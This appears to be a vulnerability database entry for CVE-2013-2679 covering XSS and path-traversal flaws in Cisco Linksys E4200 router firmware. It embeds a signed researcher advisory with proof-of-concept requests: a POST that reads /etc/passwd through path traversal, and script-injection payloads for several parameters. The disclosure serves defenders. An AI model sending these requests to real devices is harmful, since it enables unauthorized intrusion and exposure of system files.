ID

VAR-202002-0520

CVE

CVE-2013-2679

TITLE

Cisco Linksys E4200 Router Cross-Site Scripting Vulnerability

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in Cisco Linksys E4200 router with firmware 1.0.05 build 7 allow remote attackers to inject arbitrary web script or HTML via the (1) log_type, (2) ping_ip, (3) ping_size, (4) submit_type, or (5) traceroute_ip parameter to apply.cgi or (6) new_workgroup or (7) submit_button parameter to storage/apply.cgi. Cisco Linksys E4200 A cross-site scripting vulnerability exists in routers.Information may be obtained and tampered with. The Cisco Linksys E1200 N300 is a wireless router from Cisco, USA. When a user browses an affected website, their browser will execute arbitrary code provided by the attacker, which may cause the attacker to steal cookie-based authentication and launch other attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ============================================= XSS, LFI in Cisco, Linksys E4200 Firmware ============================================= URL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html ============================================= January 30, 2013 ============================================= Keywords ============================================= XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, CVE-2013-2683, CVE-2013-2684 ============================================= Summary Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router Firmware Version: 1.0.05 build 7 were discovered by our Researchers in January 2013 and finally acknowledged by Linksys in April 2013. The Vendor is unable to Patch the Vulnerability in a reasonable timeframe. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions. ============================================= Overview Linksys is a brand of home and small office networking products and a company founded in 1988, which was acquired by Cisco Systems in 2003. In 2013, as part of its push away from the consumer market, Cisco sold their home networking division and Linksys to Belkin. Products currently and previously sold under the Linksys brand name include broadband and wireless routers, consumer and small business grade Ethernet switching, VoIP equipment, wireless internet video camera, AV products, network storage systems, and other products. Linksys products were widely available in North America off-the-shelf from both consumer electronics stores (CompUSA and Best Buy), internet retailers, and big-box retail stores (WalMart). Linksys' significant competition as an independent networking firm were D-Link and NetGear, the latter for a time being a brand of Cisco competitor Nortel. ============================================= Vendor Software Fingerprint ============================================= # Copyright (C) 2009, CyberTAN Corporation # All Rights Reserved. # # THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF ANY # KIND, EXPRESS OR IMPLIED, BY STATUTE..... ============================================= The PoC's ============================================= LFI PoC ============================================= POST /storage/apply.cgi HTTP/1.1 HOST: my.vunerable.e4500.firmware submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila _cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd ============================================= XSS PoC ============================================= /apply.cgi [log_type parameter] /apply.cgi [ping_ip parameter] /apply.cgi [ping_size parameter] /apply.cgi [submit_type parameter] /apply.cgi [traceroute_ip parameter] /storage/apply.cgi [new_workgroup parameter] /storage/apply.cgi [submit_button parameter] ============================================= POST /apply.cgi HTTP/1.1 �.. change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_t ype=&log_type=ilog14568"%3balert(1)//482 ============================================= Other XSS PoC�s ============================================= &ping_ip='><script>alert(1)</script> &ping_size='><script>alert(1)</script> &submit_type=start_traceroute'%3balert(1)// &traceroute_ip=a.b.c.d"><script>alert(1)</script> ============================================= CVE Information ============================================= File path traversal CVE-2013-2678 Cross-site scripting (reflected) CVE-2013-2679 Cleartext submission of password CVE-2013-2680 Password field with autocomplete enabled CVE-2013-2681 Frameable response (Clickjacking) CVE-2013-2682 Private IP addresses disclosed CVE-2013-2683 HTML does not specify charset CVE-2013-2684 CVSS Version 2 Score = 4.5 ============================================= END ============================================= -----BEGIN PGP SIGNATURE----- Version: 10.2.0.2526 wsBVAwUBUYkNUnz+WcLIygj0AQg1/QgAs9Ij9d9e6IYfZXeeiCZTwoKdgtOVkser M3c49LB4CnJrxMqlrVNhM5Y2YxjydpGG1EfNzc49L43dC2G/Q2cHRfQOWdgcIXEG uJPDmKcONMN+V+rwvncyulGnCgl7R7whxspjqQk4Ov6lM+rbL3ulEi5Lg2IwzoYy ul0J8okWO9hTBWh9cbAiUMMJ7FsC3Kb0KUH2NepathT604Pif4zHtxcYY62jOEdy 7xrUSt1HUw9HMC1s0MHLWcqUbJowSlx6cInl977WKphWB8bK0bqWJO+C0cCC3jdI V8qUOX2sfB2znwOcfsiTH4olBBH1nlXtnRJxyTr42qET4nBfqFOshg== =w123 -----END PGP SIGNATURE-----

IOT TAXONOMY

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

XSS

CONFIGURATIONS

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

sqlhacker

SOURCES

LAST UPDATE DATE

2024-08-14T13:24:59.042000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE